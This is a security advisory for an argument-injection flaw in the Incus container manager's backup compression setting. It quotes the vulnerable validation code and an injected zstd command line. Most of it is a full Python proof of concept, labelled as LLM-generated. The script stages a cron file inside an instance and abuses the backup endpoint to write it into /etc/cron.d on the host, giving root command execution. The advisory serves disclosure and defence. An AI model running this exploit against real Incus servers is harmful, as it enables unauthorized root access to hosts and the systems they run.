Improper validation of user-provided backup compression algorithm leads to argument injection in the constructed command line. This leads to an arbitrary file write on the host, possibly leading to arbitrary command execution.
Incus validates compression_algorithm by parsing it into fields and checking only the first token against an allowlist:
fields, err := shellquote.Split(value)
...
if !slices.Contains([]string{"bzip2", "gzip", "lz4", "lzma", "pigz", "pzstd", "pxz", "tar2sqfs", "xz", "zstd"}, fields[0]) {
return fmt.Errorf("Compression algorithm %q isn't currently supported", fields[0])
}
_, err = exec.LookPath(fields[0])
Extra arguments are not rejected. compressFile() then prepends -c and passes the remaining user-supplied fields to the compressor:
args := []string{"-c"}
if len(fields) > 1 {
args = append(args, fields[1:]...)
}
cmd := exec.Command(fields[0], args...)
cmd.Stdin = infile
cmd.Stdout = outfile
With a value like:
zstd -d -f --pass-through -o /etc/cron.d/incus-zstd-rce -- /var/lib/incus/.../payload
the daemon executes the equivalent of:
zstd -c -d -f --pass-through -o /etc/cron.d/incus-zstd-rce -- /var/lib/incus/.../payload
python3 poc.py \
--insecure --url https://remote-incus:8443 \
--cert ~/.config/incus/client.crt --key ~/.config/incus/client.key \
--instance c01 \
--execute --yes-i-understand-this-writes-host-file
The following was generated by an LLM model.
#!/usr/bin/env python3
"""Short remote Incus backup compression zstd cron RCE PoC.
Dry-run is the default. --execute uploads a cron payload into an instance and then asks Incus for a direct backup with a zstd argument-injection compressor:
zstd -c -d -f --pass-through -o /etc/cron.d/incus-zstd-rce -- <source>
The direct backup may fail after zstd runs; the host file write is the primitive. Use only on an authorized Incus server.
"""
from __future__ import annotations
import argparse
import json
import os
import shlex
import sys
import urllib.parse
from pathlib import PurePosixPath
from typing import Any
import requests
def q(value: str) -> str:
return urllib.parse.quote(value, safe="")
def api(base: str, endpoint: str, **params: str) -> str:
return base.rstrip("/") + endpoint + ("?" + urllib.parse.urlencode(params) if params else "")
def project_instance(project: str, instance: str) -> str:
return instance if project == "default" else f"{project}_{instance}"
def clean_guest_path(path: str) -> str:
if not path.startswith("/"):
raise ValueError("--guest-path must be absolute")
if ".." in PurePosixPath(path).parts:
raise ValueError("--guest-path must not contain '..'")
return os.path.normpath("/" + path.lstrip("/")).lstrip("/")
def source_path(args: argparse.Namespace) -> str:
if args.source_host_path:
return args.source_host_path
return os.path.join(
args.incus_dir,
"storage-pools",
args.pool,
args.storage_kind,
project_instance(args.project, args.instance),
"rootfs",
clean_guest_path(args.guest_path),
)
def cron(command: str) -> bytes:
return f"* * * * * root /bin/sh -c {shlex.quote(command)}\n".encode()
def session(args: argparse.Namespace) -> requests.Session:
s = requests.Session()
s.verify = False if args.insecure else (args.cacert or True)
if args.cert or args.key:
s.cert = (args.cert, args.key)
if args.token:
s.headers["Authorization"] = "Bearer " + args.token
s.headers["User-Agent"] = "incus-zstd-backup-rce-poc"
if args.insecure:
requests.packages.urllib3.disable_warnings() # type: ignore[attr-defined]
return s
def check(resp: requests.Response, what: str) -> requests.Response:
if resp.status_code >= 400:
try:
detail: Any = resp.json()
except Exception:
detail = resp.text[:2048]
raise RuntimeError(f"{what} failed: HTTP {resp.status_code}: {detail}")
return resp
def upload(s: requests.Session, args: argparse.Namespace, payload: bytes) -> None:
url = api(args.url, f"/1.0/instances/{q(args.instance)}/files", project=args.project, path=args.guest_path)
headers = {
"Content-Type": "application/octet-stream",
"X-Incus-type": "file",
"X-Incus-write": "overwrite",
"X-Incus-uid": "0",
"X-Incus-gid": "0",
"X-Incus-mode": "0644",
}
print(f"[*] uploading cron payload to {args.instance}:{args.guest_path}")
check(s.post(url, data=payload, headers=headers, timeout=args.timeout), "payload upload")
def trigger_backup(s: requests.Session, args: argparse.Namespace, body: dict[str, Any]) -> None:
url = api(args.url, f"/1.0/instances/{q(args.instance)}/backups", project=args.project)
print("[*] sending direct backup request")
resp = s.post(
url,
data=json.dumps(body).encode(),
headers={"Accept": "application/octet-stream", "Content-Type": "application/json"},
timeout=args.timeout,
stream=True,
)
print(f"[*] backup HTTP {resp.status_code}")
resp.close()
if resp.status_code >= 400:
print("[*] HTTP error after compressor launch is possible; check whether the cron file was written")
def parse_args() -> argparse.Namespace:
p = argparse.ArgumentParser(description="Remote Incus zstd backup-compression cron RCE PoC")
p.add_argument("--url", required=True, help="https://host:8443")
p.add_argument("--cert", help="client certificate PEM")
p.add_argument("--key", help="client private key PEM")
p.add_argument("--cacert", help="CA certificate PEM")
p.add_argument("--token", help="bearer token")
p.add_argument("--insecure", action="store_true", help="disable TLS verification")
p.add_argument("--timeout", type=int, default=180)
p.add_argument("--project", default="default")
p.add_argument("--instance", required=True)
p.add_argument("--pool", default="default")
p.add_argument("--storage-kind", choices=["containers", "virtual-machines"], default="containers")
p.add_argument("--incus-dir", default="/var/lib/incus")
p.add_argument("--guest-path", default="/incus-zstd-cron")
p.add_argument("--source-host-path", help="override daemon-readable host path for the staged payload")
p.add_argument("--cron-path", default="/etc/cron.d/incus-zstd-rce")
p.add_argument("--command", default="date >/incus-zstd-rce; id >>/incus-zstd-rce")
p.add_argument("--execute", action="store_true", help="stage payload and send backup request")
p.add_argument("--yes-i-understand-this-writes-host-file", action="store_true", help="required with --execute")
args = p.parse_args()
if urllib.parse.urlparse(args.url).scheme != "https":
p.error("--url must use https")
if bool(args.cert) != bool(args.key):
p.error("--cert and --key must be supplied together")
if args.execute and not args.yes_i_understand_this_writes_host_file:
p.error("--execute requires --yes-i-understand-this-writes-host-file")
try:
clean_guest_path(args.guest_path)
except ValueError as exc:
p.error(str(exc))
args.url = args.url.rstrip("/")
return args
def main() -> int:
args = parse_args()
src = source_path(args)
payload = cron(args.command)
compressor = f"zstd -d -f --pass-through -o {shlex.quote(args.cron_path)} -- {shlex.quote(src)}"
body = {"compression_algorithm": compressor, "instance_only": True}
print("[*] target:", args.url)
print("[*] project:", args.project)
print("[*] instance:", args.instance)
print("[*] source host path:", src)
print("[*] cron path:", args.cron_path)
print("[*] payload:", payload.decode().rstrip())
print("[*] backup body:", json.dumps(body, sort_keys=True))
if not args.execute:
print("[*] dry run only; add --execute and the confirmation flag to act")
return 0
s = session(args)
upload(s, args, payload)
trigger_backup(s, args, body)
return 0
if __name__ == "__main__":
try:
raise SystemExit(main())
except BrokenPipeError:
raise SystemExit(1)
except Exception as exc:
print(f"[-] {exc}", file=sys.stderr)
raise SystemExit(1)
Improperly validated compression algorithm argument leads to argument injection leading to arbitrary file write with zstd and possibly arbitrary command execution.
{
"nvd_published_at": null,
"cwe_ids": [
"CWE-20"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-26T19:03:31Z",
"severity": "CRITICAL"
}